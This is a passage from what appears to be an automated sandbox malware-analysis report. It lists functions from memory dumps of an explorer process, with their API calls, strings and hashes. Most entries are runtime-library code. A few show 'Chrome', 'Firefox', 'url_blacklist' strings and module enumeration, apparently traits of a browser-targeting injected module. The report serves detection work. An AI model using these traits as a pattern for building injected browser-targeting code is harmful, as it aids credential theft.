_getptd.LIBCMT ref: 03343911
_getptd.LIBCMT ref: 0334391D

Strings

csm, xrefs: 033438DF

Memory Dump Source

Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3320000_explorer.jbxd

Yara matches

Similarity

API ID: _getptd$DestructExceptionObject$_amsg_exit_getptd_noexit
String ID: csm
API String ID: 331613561-1018135373
Opcode ID: 5e84bfd2dc6374b3e8ed0f893bd8a07073a9945c7d24500524e6b3446befad47
Instruction ID: 291422d394174516a76cc4162c56e057022950ea080b45b94cc57beb8ad60b10
Opcode Fuzzy Hash: 5e84bfd2dc6374b3e8ed0f893bd8a07073a9945c7d24500524e6b3446befad47
Instruction Fuzzy Hash: EA213E3A60478486DB30DF16E48035EBBA1F789BA5F444216DF9917B54DF39E586CB00

Function 0332C3A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0332C3B9

Part of subcall function 0333B790: _lock.LIBCMT ref: 0333B7A2

Part of subcall function 0332DB40: std::_Lockit::_Lockit.LIBCPMT ref: 0332DB56
Part of subcall function 0332DB40: std::_Lockit::~_Lockit.LIBCPMT ref: 0332DB79

std::_Facet_Register.LIBCPMT ref: 0332C41E
std::_Lockit::~_Lockit.LIBCPMT ref: 0332C428
std::bad_exception::bad_exception.LIBCMT ref: 0332C44C
_CxxThrowException.LIBCMT ref: 0332C45D

Strings

: The expression contained mismatched [ and ]., xrefs: 0332C440

Memory Dump Source

Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3320000_explorer.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
String ID: : The expression contained mismatched [ and ].
API String ID: 885392049-2484396094
Opcode ID: 8dc41d5dbb65d61d7cc90533f1c3d6d8eef9333a717630de676929cf2e46a118
Instruction ID: d6eb7c1f0717a60dfec7fe1524559ecd10c19cc497bf19732ad7fe0c2a092775
Opcode Fuzzy Hash: 8dc41d5dbb65d61d7cc90533f1c3d6d8eef9333a717630de676929cf2e46a118
Instruction Fuzzy Hash: 3C119136B04B4491DE11DB16E8D036EE765F789BE4F8882219AAD4BBA8DF7CC245C700

Function 0332C2D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0332C2E9

Part of subcall function 0333B790: _lock.LIBCMT ref: 0333B7A2

Part of subcall function 0332DB40: std::_Lockit::_Lockit.LIBCPMT ref: 0332DB56
Part of subcall function 0332DB40: std::_Lockit::~_Lockit.LIBCPMT ref: 0332DB79

std::_Facet_Register.LIBCPMT ref: 0332C34E
std::_Lockit::~_Lockit.LIBCPMT ref: 0332C358
std::bad_exception::bad_exception.LIBCMT ref: 0332C37C
_CxxThrowException.LIBCMT ref: 0332C38D

Strings

: The expression contained mismatched [ and ]., xrefs: 0332C370

Memory Dump Source

Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3320000_explorer.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
String ID: : The expression contained mismatched [ and ].
API String ID: 885392049-2484396094
Opcode ID: f7786013f5cd33757e87bfec871b2f1cb24b3109d5a916a062dc856c4de14913
Instruction ID: a3663b0003a19569a89b67cfa8746034befd984991e0acf2afcae240f73b8d0a
Opcode Fuzzy Hash: f7786013f5cd33757e87bfec871b2f1cb24b3109d5a916a062dc856c4de14913
Instruction Fuzzy Hash: F5119435704B4491DE05DB22F4D035DE365F789BE0F4882219A9D4BBA8DF7CC646C700

Function 03343954 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 03343975
_getptd.LIBCMT ref: 03343983
_getptd.LIBCMT ref: 03343995

Strings

RCC, xrefs: 0334395B
MOC, xrefs: 03343963
csm, xrefs: 0334396B

Memory Dump Source

Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3320000_explorer.jbxd

Yara matches

Similarity

API ID: _getptd
String ID: MOC$RCC$csm
API String ID: 3186804695-2671469338
Opcode ID: 7997cc07de5a0b9fe1d06e3a3cd088aa0d5137e088e48fbd6215a328365de7e6
Instruction ID: b5941283da970cbabcdc0fb4b360dfa1193aa290d5132c42fd197e9919cd8c9f
Opcode Fuzzy Hash: 7997cc07de5a0b9fe1d06e3a3cd088aa0d5137e088e48fbd6215a328365de7e6
Instruction Fuzzy Hash: 42E0123ED10245D6C769EB6585C43AD3AE0FBD8725F8AD56586144B300C7BDA5E08E12

Function 09844554 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 09844575
_getptd.LIBCMT ref: 09844583
_getptd.LIBCMT ref: 09844595

Strings

RCC, xrefs: 0984455B
csm, xrefs: 0984456B
MOC, xrefs: 09844563

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: _getptd
String ID: MOC$RCC$csm
API String ID: 3186804695-2671469338
Opcode ID: 7997cc07de5a0b9fe1d06e3a3cd088aa0d5137e088e48fbd6215a328365de7e6
Instruction ID: 05308f09187e746adafb077c42ee10e474e18ee8530d9ad830798e0b1c96e890
Opcode Fuzzy Hash: 7997cc07de5a0b9fe1d06e3a3cd088aa0d5137e088e48fbd6215a328365de7e6
Instruction Fuzzy Hash: 33E06D7650420CC6CB256B7884043AC36F0EFA8B19F97E4BDA620C2360C7BC44908A13

Function 09824A00 Relevance: 9.1, APIs: 6, Instructions: 76COMMONLIBRARYCODE

Download Yara Rule

APIs

isdigit.MSVCRT ref: 09824A27
isdigit.MSVCRT ref: 09824A46
isdigit.MSVCRT ref: 09824A60
isdigit.MSVCRT ref: 09824A7F
isdigit.MSVCRT ref: 09824AA1
isdigit.MSVCRT ref: 09824AAE

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: isdigit
String ID:
API String ID: 2326231117-0
Opcode ID: 06d4147f36d1048e68fff4854dd20f832a27fc448c1145862ed6e7d68071b082
Instruction ID: a0cd57d51a69f7faf98b77395c308513ac50b1de7934b8fe303c7824eeb772ea
Opcode Fuzzy Hash: 06d4147f36d1048e68fff4854dd20f832a27fc448c1145862ed6e7d68071b082
Instruction Fuzzy Hash: 9B21C520A45A7186EB30DF71E8D6B3A23D8A720F95F00401EE543C6B75EB1DC0D48769

Function 09835880 Relevance: 9.0, APIs: 6, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32 ref: 098358AF
lstrlenA.KERNEL32 ref: 098358BA
malloc.MSVCRT ref: 098358C8
lstrcpyA.KERNEL32 ref: 098358DF
lstrcatA.KERNEL32 ref: 098358EB
lstrcatA.KERNEL32 ref: 098358F7

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcatlstrlen$lstrcpymalloc
String ID:
API String ID: 3932841890-0
Opcode ID: 26f3c2fe96ec8b53ba7d873d714c4c0d1bcf5c705161d735941e7bf04a66f02f
Instruction ID: 00baba20af85e3bcafc0af8e44019a6c5786a48a69b542e4cef08d7465f5734b
Opcode Fuzzy Hash: 26f3c2fe96ec8b53ba7d873d714c4c0d1bcf5c705161d735941e7bf04a66f02f
Instruction Fuzzy Hash: 02016D21704B4582EF589F67B95872A6361EF9AFC0F48D4359D4F4BB1ADE3CC0858700

Function 0983CD1C Relevance: 9.0, APIs: 6, Instructions: 30COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 0983CD36
abort.LIBCMT ref: 0983CD53
DecodePointer.KERNEL32 ref: 0983CD67
_NMSG_WRITE.LIBCMT ref: 0983CD79
_set_abort_behavior.LIBCMT ref: 0983CD85
abort.LIBCMT ref: 0983CD8A

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: Pointerabort$DecodeEncode_set_abort_behavior
String ID:
API String ID: 2556904055-0
Opcode ID: 4eee50fa0f7e27dce3ca1ba23277c15061aad6adf7266d05848666a1cff57a75
Instruction ID: 2083471d559799acbf6f04cff89456ec23200bd41891cf7533b538ec578b3ebb
Opcode Fuzzy Hash: 4eee50fa0f7e27dce3ca1ba23277c15061aad6adf7266d05848666a1cff57a75
Instruction Fuzzy Hash: BCF08C28602F0C81EE486F68EC643193320FF8AB02F85DC1DCA4EA7762DE3C91598702

Function 0333EFB0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0333F095
__crtCompareStringEx.LIBCMT ref: 0333F0F0
free.LIBCMT ref: 0333F103
free.LIBCMT ref: 0333F114

Strings

p, xrefs: 0333EFB0

Memory Dump Source

Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3320000_explorer.jbxd

Yara matches

Similarity

API ID: free$CompareString__crtmalloc
String ID: p
API String ID: 1736151240-2181537457
Opcode ID: 73e5a8a52c0a39e0188a483ffdf8b6321454de3d3f57362cdf5020de639b8068
Instruction ID: fabd42617576c3ed778280aeb1d616b8566608b62722eb69c0edd768c66ce746
Opcode Fuzzy Hash: 73e5a8a52c0a39e0188a483ffdf8b6321454de3d3f57362cdf5020de639b8068
Instruction Fuzzy Hash: AB31D172B0474186DB21DF1AE9807A9B795F786BA8F988712DA1D47B94DB7CC145C300

Function 0982CFA0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0982CFB9

Part of subcall function 0983C390: _lock.LIBCMT ref: 0983C3A2

Part of subcall function 0982E740: std::_Lockit::_Lockit.LIBCPMT ref: 0982E756

std::_Facet_Register.LIBCPMT ref: 0982D01E
std::bad_exception::bad_exception.LIBCMT ref: 0982D04C
_CxxThrowException.LIBCMT ref: 0982D05D

Strings

bad cast, xrefs: 0982D040

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 1776536810-3145022300
Opcode ID: c1b9892ce7d6fabe14467b7f8ac8b0f2f6d38a035db2db810570c5f17772f7fb
Instruction ID: 7148febcce059137f0fee60200124d775b980766f10745a9975bc36494379ea5
Opcode Fuzzy Hash: c1b9892ce7d6fabe14467b7f8ac8b0f2f6d38a035db2db810570c5f17772f7fb
Instruction Fuzzy Hash: D9119431304B4481DE10DB26E454359A361F7C9BE4F88C22999DD97BA9DF7CC146C741

Function 0982CED0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0982CEE9

Part of subcall function 0983C390: _lock.LIBCMT ref: 0983C3A2

Part of subcall function 0982E740: std::_Lockit::_Lockit.LIBCPMT ref: 0982E756

std::_Facet_Register.LIBCPMT ref: 0982CF4E
std::bad_exception::bad_exception.LIBCMT ref: 0982CF7C
_CxxThrowException.LIBCMT ref: 0982CF8D

Strings

bad cast, xrefs: 0982CF70

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 1776536810-3145022300
Opcode ID: 2c293c4bd445611631076043477384d2d0f414fc123820659eb49069db396af7
Instruction ID: 6eb8f07cc727eafb1d491b5a525c31dbe0eb2d09184b330d81874577837eb260
Opcode Fuzzy Hash: 2c293c4bd445611631076043477384d2d0f414fc123820659eb49069db396af7
Instruction Fuzzy Hash: 53115832304B5091DE00DB25E44436DB361F7C5BE4F88D2299A9D97BA9DF7CC54AC741

Function 0332CDE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0332CDF2

Part of subcall function 0333B790: _lock.LIBCMT ref: 0333B7A2

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0332CE38

Part of subcall function 0333BF6C: setlocale.LIBCMT ref: 0333BF80
Part of subcall function 0333BF6C: _Yarn.LIBCPMT ref: 0333BF9A
Part of subcall function 0333BF6C: setlocale.LIBCMT ref: 0333BFA9

std::bad_exception::bad_exception.LIBCMT ref: 0332CE57
_CxxThrowException.LIBCMT ref: 0332CE68

Strings

url_blacklist, xrefs: 0332CE4B

Memory Dump Source

Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3320000_explorer.jbxd

Yara matches

Similarity

API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarn_lockstd::bad_exception::bad_exception
String ID: url_blacklist
API String ID: 1861546320-2937129071
Opcode ID: 5c355203c424fcdde38b676968eb1ad36987fc9aa9b9f6ef8ed236e096919255
Instruction ID: 5d9895edde1870bb8f99051d213ce3962ea95dd8f232a7e199d59241bb81d815
Opcode Fuzzy Hash: 5c355203c424fcdde38b676968eb1ad36987fc9aa9b9f6ef8ed236e096919255
Instruction Fuzzy Hash: FEF01277A10E5550CB54EF26D9D015CE725EB98B84FC4B021965E4F568EF24CA45C390

Function 0982D9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0982D9F2

Part of subcall function 0983C390: _lock.LIBCMT ref: 0983C3A2

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0982DA38

Part of subcall function 0983CB6C: setlocale.LIBCMT ref: 0983CB80
Part of subcall function 0983CB6C: _Yarn.LIBCPMT ref: 0983CB9A
Part of subcall function 0983CB6C: setlocale.LIBCMT ref: 0983CBA9

std::bad_exception::bad_exception.LIBCMT ref: 0982DA57
_CxxThrowException.LIBCMT ref: 0982DA68

Strings

bad locale name, xrefs: 0982DA4B

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarn_lockstd::bad_exception::bad_exception
String ID: bad locale name
API String ID: 1861546320-1405518554
Opcode ID: 0b99a4e70dfc6c7fe37576a9850908aef64fdc5d550c1a7abe3e2b5dc80e7d22
Instruction ID: 327d56240d397c4f9c25d73f1703b3c525aea9f863df749ff9e2915a156f09e0
Opcode Fuzzy Hash: 0b99a4e70dfc6c7fe37576a9850908aef64fdc5d550c1a7abe3e2b5dc80e7d22
Instruction Fuzzy Hash: 41F0A262210D1150CB00FF2CD95039C6725EF98B88FD4E0298A4EC7BA8FE74C986C382

Function 0984DC6C Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0984DCCE
_isleadbyte_l.LIBCMT ref: 0984DCFE
MultiByteToWideChar.KERNEL32 ref: 0984DD3D
MultiByteToWideChar.KERNEL32 ref: 0984DD8B
_errno.LIBCMT ref: 0984DD95

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
String ID:
API String ID: 2998201375-0
Opcode ID: 9bf59e59e5c08a92196a8eecb1bdc593485ce24b2fd89f1deead426ddc14eaea
Instruction ID: 3cffe9443a4af92ab081e91e7273fae22c48b67df80599d8983677ac86945146
Opcode Fuzzy Hash: 9bf59e59e5c08a92196a8eecb1bdc593485ce24b2fd89f1deead426ddc14eaea
Instruction Fuzzy Hash: 6531D67221478487DB209F25E940329BB65FF95FC4F18812AEF89D7B99DB38D441C700

Function 09839FF0 Relevance: 7.6, APIs: 5, Instructions: 57processCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0983A028
CreateToolhelp32Snapshot.KERNEL32 ref: 0983A037
Module32First.KERNEL32 ref: 0983A055
Module32Next.KERNEL32 ref: 0983A075
Module32Next.KERNEL32 ref: 0983A097

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: Module32$Next$CreateCurrentFirstProcessSnapshotToolhelp32
String ID:
API String ID: 3721439000-0
Opcode ID: add457e1e98920d2760c7c05102d119e105337da01049b787e53bb3b1fde5219
Instruction ID: e9ad1548ba66c1950e5311bb34e9b465fd77174d11f325cb6e9dda17d002d5b2
Opcode Fuzzy Hash: add457e1e98920d2760c7c05102d119e105337da01049b787e53bb3b1fde5219
Instruction Fuzzy Hash: 4D119322218644A2DA24DF29E59036A7365FBC93D4FD0E215DA9DC7798DF2CC509CB41

Function 0333D074 Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 0333D081

Part of subcall function 033417AC: _getptd_noexit.LIBCMT ref: 033417B2
Part of subcall function 033417AC: _amsg_exit.LIBCMT ref: 033417C2

_inconsistency.LIBCMT ref: 0333D08F
_getptd.LIBCMT ref: 0333D094
_inconsistency.LIBCMT ref: 0333D0B0
_getptd.LIBCMT ref: 0333D0C0

Memory Dump Source

Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3320000_explorer.jbxd

Yara matches

Similarity

API ID: _getptd$_inconsistency$_amsg_exit_getptd_noexit
String ID:
API String ID: 823043651-0
Opcode ID: a59402f6edba0345271037812e36e693c9b41085103b3a28d7fde40256890806
Instruction ID: ee408f09fa7c2ea09e893c1822d21430de90259f4d8056eadc3c3ef0fd7ab682
Opcode Fuzzy Hash: a59402f6edba0345271037812e36e693c9b41085103b3a28d7fde40256890806
Instruction Fuzzy Hash: 6DE0392AA14B8190CA21EB61E2C02EDAAA4EB89F94F0CC171AB440F609DE28D4A18355

Function 0983DC74 Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 0983DC81

Part of subcall function 098423AC: _getptd_noexit.LIBCMT ref: 098423B2
Part of subcall function 098423AC: _amsg_exit.LIBCMT ref: 098423C2

_inconsistency.LIBCMT ref: 0983DC8F

Part of subcall function 09844BB0: DecodePointer.KERNEL32 ref: 09844BBB

_getptd.LIBCMT ref: 0983DC94
_inconsistency.LIBCMT ref: 0983DCB0
_getptd.LIBCMT ref: 0983DCC0

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
String ID:
API String ID: 3669027769-0
Opcode ID: a59402f6edba0345271037812e36e693c9b41085103b3a28d7fde40256890806
Instruction ID: 151a54d04a75c2b0abc8776bbd6197614594da872e5206adbf29c48f23ce3826
Opcode Fuzzy Hash: a59402f6edba0345271037812e36e693c9b41085103b3a28d7fde40256890806
Instruction Fuzzy Hash: C3E06532224688C0CA21BF75E0403BD63A0EF98F94F4CE47DEB5487755DE64C4A18796

Function 0334E43E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 0333D074: _getptd.LIBCMT ref: 0333D081
Part of subcall function 0333D074: _inconsistency.LIBCMT ref: 0333D08F
Part of subcall function 0333D074: _getptd.LIBCMT ref: 0333D094
Part of subcall function 0333D074: _inconsistency.LIBCMT ref: 0333D0B0

__DestructExceptionObject.LIBCMT ref: 0334E48B
_getptd.LIBCMT ref: 0334E491
_getptd.LIBCMT ref: 0334E4A4

Part of subcall function 0333D104: _getptd.LIBCMT ref: 0333D10D

Strings

csm, xrefs: 0334E45E

Memory Dump Source

Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3320000_explorer.jbxd

Yara matches

Similarity

API ID: _getptd$_inconsistency$DestructExceptionObject
String ID: csm
API String ID: 2821275340-1018135373
Opcode ID: 3d3c92d82db18198882214c5651a9633e7408605bbfd0fafc6450b131983cc71
Instruction ID: 00b74c7600b39b77c84247be6215f5fefe25924412cc36a816741407d6621367
Opcode Fuzzy Hash: 3d3c92d82db18198882214c5651a9633e7408605bbfd0fafc6450b131983cc71
Instruction Fuzzy Hash: 13F03C2AA4064189CB20EF31E8C02AC2BA4F785B99F4A5661DE895E704DE24D4C5C740

Function 0984F03E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 0983DC74: _getptd.LIBCMT ref: 0983DC81
Part of subcall function 0983DC74: _inconsistency.LIBCMT ref: 0983DC8F
Part of subcall function 0983DC74: _getptd.LIBCMT ref: 0983DC94
Part of subcall function 0983DC74: _inconsistency.LIBCMT ref: 0983DCB0

__DestructExceptionObject.LIBCMT ref: 0984F08B
_getptd.LIBCMT ref: 0984F091
_getptd.LIBCMT ref: 0984F0A4

Part of subcall function 0983DD04: _getptd.LIBCMT ref: 0983DD0D

Strings

csm, xrefs: 0984F05E

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: _getptd$_inconsistency$DestructExceptionObject
String ID: csm
API String ID: 2821275340-1018135373
Opcode ID: 3d3c92d82db18198882214c5651a9633e7408605bbfd0fafc6450b131983cc71
Instruction ID: 133e52f8a20a3f59db29fc9fa59e97d5fe299633a1db51cd16d194bbfb64c411
Opcode Fuzzy Hash: 3d3c92d82db18198882214c5651a9633e7408605bbfd0fafc6450b131983cc71
Instruction Fuzzy Hash: 9DF037722406498ACB20AF35D8817AC3364EFD5B99F48A93DEE89CA705EF21C4C1C742

Function 0333C190 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMONLIBRARYCODE

Download Yara Rule

APIs

_callnewh.LIBCMT ref: 0333C19E
malloc.LIBCMT ref: 0333C1AA

Part of subcall function 0333CB0C: _FF_MSGBANNER.LIBCMT ref: 0333CB3C
Part of subcall function 0333CB0C: _NMSG_WRITE.LIBCMT ref: 0333CB46
Part of subcall function 0333CB0C: _callnewh.LIBCMT ref: 0333CB7A
Part of subcall function 0333CB0C: _errno.LIBCMT ref: 0333CB85
Part of subcall function 0333CB0C: _errno.LIBCMT ref: 0333CB90

_CxxThrowException.LIBCMT ref: 0333C1F3

Strings

rSingleObject, xrefs: 0333C1E2

Memory Dump Source

Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3320000_explorer.jbxd

Yara matches

Similarity

API ID: _callnewh_errno$ExceptionThrowmalloc
String ID: rSingleObject
API String ID: 431260796-42315373
Opcode ID: b9ab288bb57c8fb22b4374bb0545ee38fb12452fb9c247dc91e5ab0c792df9f6
Instruction ID: f80aa94263451553fa08b352330b95d7d644aed83bd2a1966d5f6236f3c714d7
Opcode Fuzzy Hash: b9ab288bb57c8fb22b4374bb0545ee38fb12452fb9c247dc91e5ab0c792df9f6
Instruction Fuzzy Hash: 1FF0895AB05B4A51DE24D751F4C0795A364E785384F489421CE4E0F764EF7CC349CB01

Function 0983CD90 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMONLIBRARYCODE

Download Yara Rule

APIs

_callnewh.LIBCMT ref: 0983CD9E
malloc.LIBCMT ref: 0983CDAA

Part of subcall function 0983D70C: _FF_MSGBANNER.LIBCMT ref: 0983D73C
Part of subcall function 0983D70C: _NMSG_WRITE.LIBCMT ref: 0983D746
Part of subcall function 0983D70C: HeapAlloc.KERNEL32 ref: 0983D761
Part of subcall function 0983D70C: _callnewh.LIBCMT ref: 0983D77A
Part of subcall function 0983D70C: _errno.LIBCMT ref: 0983D785
Part of subcall function 0983D70C: _errno.LIBCMT ref: 0983D790

_CxxThrowException.LIBCMT ref: 0983CDF3

Part of subcall function 0983D7CC: RtlPcToFileHeader.NTDLL ref: 0983D85B
Part of subcall function 0983D7CC: RaiseException.KERNEL32 ref: 0983D89A

Strings

bad allocation, xrefs: 0983CDBA

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
String ID: bad allocation
API String ID: 1214304046-2104205924
Opcode ID: 25a09b959b445181ca9606f09c8f966ee2b22572cdda355b5cb88af33e88a94b
Instruction ID: d1966663bb3b478673f989d1a348ec499ac1bfc6ff8ee9303f4eb76281b6393e
Opcode Fuzzy Hash: 25a09b959b445181ca9606f09c8f966ee2b22572cdda355b5cb88af33e88a94b
Instruction Fuzzy Hash: 95F0E265701B4E80DE20AB54A4007996750E795384F84D428EE8E8BB64EF3CC24ECB41

Function 0983A1C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 09828DB0: HeapCreate.KERNEL32 ref: 09828DCD

Part of subcall function 0983BDA0: lstrcpyA.KERNEL32 ref: 0983BDF4

RtlInitializeCriticalSection.NTDLL ref: 0983A1F1
RtlInitializeCriticalSection.NTDLL ref: 0983A1FE

Strings

Firefox, xrefs: 0983A1C9
Chrome, xrefs: 0983A1D7

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection$CreateHeaplstrcpy
String ID: Chrome$Firefox
API String ID: 3526404123-2335468407
Opcode ID: 9d0fbc751aaf2160716b6f4dc0322b64a8c23c7c8581ce340a51a29f6b9d1384
Instruction ID: 15492295cc1bc7c1fe1e35d2df8be0b74a4a2b6a330484882bf2ae0cc3e5a377
Opcode Fuzzy Hash: 9d0fbc751aaf2160716b6f4dc0322b64a8c23c7c8581ce340a51a29f6b9d1384
Instruction Fuzzy Hash: D9E00968A12F01DAFB00EBA9FC8439433A8B756705FC18125C44D4A372EF3C859AC795

Function 09835720 Relevance: 6.3, APIs: 5, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI ref: 09835735
lstrlenA.KERNEL32 ref: 09835758
StrStrIA.SHLWAPI ref: 0983576A
malloc.MSVCRT ref: 0983577D
memcpy.MSVCRT ref: 09835792

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlenmallocmemcpy
String ID:
API String ID: 1128592954-0
Opcode ID: 7e0912bcf351996b291bf4fb3f87cb9c28880ce2d9d20d15a7e9bb782bf88500
